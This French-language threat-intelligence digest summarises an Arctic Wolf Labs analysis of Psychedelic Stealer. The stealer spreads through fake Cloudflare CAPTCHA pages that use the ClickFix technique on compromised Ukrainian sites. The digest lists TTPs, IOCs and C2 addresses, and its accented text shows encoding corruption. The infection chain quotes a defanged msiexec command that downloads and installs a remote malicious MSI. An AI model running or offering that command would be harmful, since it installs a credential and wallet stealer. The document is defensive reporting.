đ Contexte
Arctic Wolf Labs a publiĂ© le 24 septembre 2026 une analyse technique dĂ©taillĂ©e d’une campagne en cours ciblant principalement des utilisateurs ukrainiens via des sites web lĂ©gitimes compromis.
đŻ Vecteur d’infection
Les attaquants ont injectĂ© des iframes malveillants dans plusieurs sites d’entreprises ukrainiennes lĂ©gitimes (clinique capillaire, fabricant de maquettes, libraire, Ă©tablissement psychologique, revendeur d’outils, revendeur automobile). L’iframe charge une fausse page de vĂ©rification Cloudflare en langue ukrainienne, imitant un CAPTCHA authentique.
La technique ClickFix est utilisĂ©e : au clic sur le CAPTCHA, une commande msiexec.exe est copiĂ©e dans le presse-papiers, et l’utilisateur est invitĂ© Ă la coller dans la boĂźte de dialogue Windows Run pour dĂ©clencher l’installation.
âïž ChaĂźne d’infection
- Visite d’un site ukrainien compromis
- Chargement de l’iframe attaquant via
fsputnik[.]com/tds/tracker.js - Affichage de la fausse page CAPTCHA Cloudflare
- Copie automatique d’une commande
msiexec /i https://uasputnik[.]com/elita.msi /passivedans le presse-papiers - L’utilisateur exĂ©cute la commande via Windows+R
- TĂ©lĂ©chargement et installation du MSI â dĂ©ploiement de
psychedeliclove.exe
đŠ Analyse de Psychedelic Stealer
Le payload final est un exĂ©cutable Windows 64 bits contenant le tag de configuration embarquĂ© “Psychedelic”. Ses capacitĂ©s incluent :
- Vol de credentials navigateur : Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex (Chromium-based)
- Vol de tokens de compte : extraction depuis la base Web Data Chromium
- Vol de wallets crypto : extensions MetaMask, Trust Wallet, OKX Wallet, SafePal ; applications desktop Exodus, Atomic Wallet, Electrum, Bitcoin Core, Litecoin Core
- Déploiement de composants navigateur : bridge native messaging
com.lunex.explorer, fichiershost.ps1,host.bat - Persistance : tùche planifiée nommée
psychedelicloveUtils - Profilage hĂŽte : nom machine, OS, CPU, GPU, RAM, disque, fuseau horaire, langue, MAC, statut admin, antivirus
- C2 avec tasking distant : support EXE, COM, BAT, CMD, MSI, PowerShell pour exécution de payloads additionnels
đ„ïž Infrastructure
- Domaine leurre :
uasputnik[.]com(enregistré le 9 septembre 2026) - IP associée :
176.53.159[.]40(AS154383, ZORNTECH WEB SOLUTIONS) - C2 implant :
193.178.159[.]128:8080 - Téléchargement payload :
107.175.82[.]242:9000/wilow/psychedeliclove.exe - Panel de gestion : brandĂ© “Đ ĐŁĐĐĐĐĐĐ TDS”, avec commentaires HTML en russe et
lang="ru"
đ TĂ©lĂ©mĂ©trie du panel
Le panel exposĂ© a enregistrĂ© 557 vues, 426 clics et 79 Ă©vĂ©nements “complete” dans 32 pays. L’Ukraine reprĂ©sente 446 vues (80%), suivie des Ătats-Unis (31), de la Pologne (16) et de l’Allemagne (12).
đ·ïž Type d’article
Analyse technique et rapport de recherche publié par Arctic Wolf Labs, visant à documenter une nouvelle famille de malware non attribuée, fournir des IOCs exploitables et des pistes de détection pour les équipes SOC.
đ§ TTPs et IOCs dĂ©tectĂ©s
TTP
- T1189 â Drive-by Compromise (Initial Access)
- T1059.001 â Command and Scripting Interpreter: PowerShell (Execution)
- T1204.002 â User Execution: Malicious File (Execution)
- T1218.007 â System Binary Proxy Execution: Msiexec (Defense Evasion)
- T1547.005 â Boot or Logon Autostart Execution: Security Support Provider (Persistence)
- T1053.005 â Scheduled Task/Job: Scheduled Task (Persistence)
- T1555.003 â Credentials from Password Stores: Credentials from Web Browsers (Credential Access)
- T1539 â Steal Web Session Cookie (Credential Access)
- T1082 â System Information Discovery (Discovery)
- T1041 â Exfiltration Over C2 Channel (Exfiltration)
- T1071.001 â Application Layer Protocol: Web Protocols (Command and Control)
- T1105 â Ingress Tool Transfer (Command and Control)
- T1176 â Browser Extensions (Persistence)
- T1027 â Obfuscated Files or Information (Defense Evasion)
- T1566 â Phishing (Initial Access)
IOC
- IPv4 :
176.53.159.40â AbuseIPDB · VT · ThreatFox - IPv4 :
107.175.82.242â AbuseIPDB · VT · ThreatFox - IPv4 :
193.178.159.128â AbuseIPDB · VT · ThreatFox - Domaines :
uasputnik.comâ VT · URLhaus · ThreatFox - Domaines :
fsputnik.comâ VT · URLhaus · ThreatFox - URLs :
https://uasputnik.com/sputnik.htmlâ URLhaus - URLs :
https://uasputnik.com/elita.msiâ URLhaus - URLs :
https://uasputnik.com/admin777111777.phpâ URLhaus - URLs :
http://107.175.82.242:9000/wilow/psychedeliclove.exeâ URLhaus - URLs :
http://193.178.159.128:8080â URLhaus - SHA256 :
38e90affe37342ee36917cdc535fe9bf04589afa8430eb8d1ba1016adcfc1878aâ VT · MalwareBazaar - SHA256 :
06f434695f93d7fd11eeff71358ff69fed79d310a66d993bbcc4ff979c117c90â VT · MalwareBazaar - Fichiers :
elita.msi - Fichiers :
miks.msi - Fichiers :
sova.msi - Fichiers :
psychedeliclove.exe - Fichiers :
host.ps1 - Fichiers :
host.bat - Fichiers :
com.lunex.explorer.json - Fichiers :
executed_tasks.json - Fichiers :
wd_tmp.db
â ïž Ă propos de ces IOC â ils sont extraits automatiquement de l’article original le 25 septembre 2026 et n’ont pas fait l’objet d’une vĂ©rification externe. Un indicateur peut avoir Ă©tĂ© rĂ©attribuĂ© depuis : une IP de C2 peut redevenir un service lĂ©gitime, un domaine sinkholĂ© peut changer de propriĂ©taire. Aucune garantie d’exactitude ni d’actualitĂ© â contrĂŽlez leur validitĂ© avant tout usage opĂ©rationnel, en particulier avant de les injecter dans une blocklist ou un SIEM.
Malware / Outils
- Psychedelic Stealer (stealer)
đą Indice de vĂ©rification factuelle : 90/100 (haute)
- â arcticwolf.com â source reconnue (liste interne) (20pts)
- â 33344 chars â texte complet (fulltext extrait) (15pts)
- â 21 IOCs dont des hashes (15pts)
- â 5/10 IOCs confirmĂ©s (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (15pts)
- â 15 TTPs MITRE identifiĂ©es (15pts)
- â date extraite du HTML source (10pts)
- ⏠aucun acteur de menace nommé (0pts)
- ⏠pas de CVE à vérifier (0pts)
IOCs confirmés externellement :
176.53.159.40(ip) â VT (3/91 dĂ©tections)107.175.82.242(ip) â VT (8/91 dĂ©tections)193.178.159.128(ip) â VT (4/91 dĂ©tections)06f434695f93d7fdâŠ(sha256) â VT (50/76 dĂ©tections)uasputnik.com(domain) â VT (17/91 dĂ©tections)
đ Source originale : https://arcticwolf.com/resources/blog/psychedelic-stealer-fake-clickfix-captcha-targets-ukraine/